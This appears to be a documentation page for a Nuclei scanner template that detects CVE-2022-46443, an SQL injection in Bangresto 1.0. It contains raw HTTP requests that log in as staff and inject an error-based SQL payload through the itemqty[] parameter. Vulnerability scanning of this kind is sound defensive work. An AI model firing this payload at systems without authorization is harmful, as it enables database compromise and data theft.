Skip to content
Nuclei Templates

Bangresto - SQL Injection

ID: CVE-2022-46443

Severity: high

Author: Harsh

Tags: cve,cve2022,bangresto,sqli,bangresto_project

Description

Section titled “Description”

Bangresto 1.0 is vulnberable to SQL Injection via the itemqty%5B%5D parameter.

YAML Source

Section titled “YAML Source”
id: CVE-2022-46443


info:
  name: Bangresto - SQL Injection
  author: Harsh
  severity: high
  description: |
    Bangresto 1.0 is vulnberable to SQL Injection via the itemqty%5B%5D parameter.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire application and underlying database.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://yuyudhn.github.io/CVE-2022-46443/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-46443
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2022-46443
    cwe-id: CWE-89
    epss-score: 0.05592
    epss-percentile: 0.93248
    cpe: cpe:2.3:a:bangresto_project:bangresto:1.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: bangresto_project
    product: bangresto
  tags: cve,cve2022,bangresto,sqli,bangresto_project
variables:
  num: "999999999"


http:
  - raw:
      - |
        POST /bangresto-main/staff/process.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8


        username={{username}}&password={{password}}
      - |
        POST /bangresto-main/staff/insertorder.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded;


        itemID[]=1&itemqty[]=2 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716a7a6b71,md5({{num}}),0x7178717a71,0x78))s), 8446744073709551610, 8446744073709551610)))&sentorder=Sent to kitchen


    matchers-condition: and
    matchers:
      - type: word
        words:
          - '{{md5({{num}})}}'
# digest: 4b0a00483046022100a1e8c8a10aabc9d0ee7ae478b4c948dde7b271c428e7187a4bf87e3de44d8ea8022100bcf157499e18a0eaaf091ce75fd78cd4af65122bae3416fd1a18783c59048c67:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-46443.yaml"

View on Github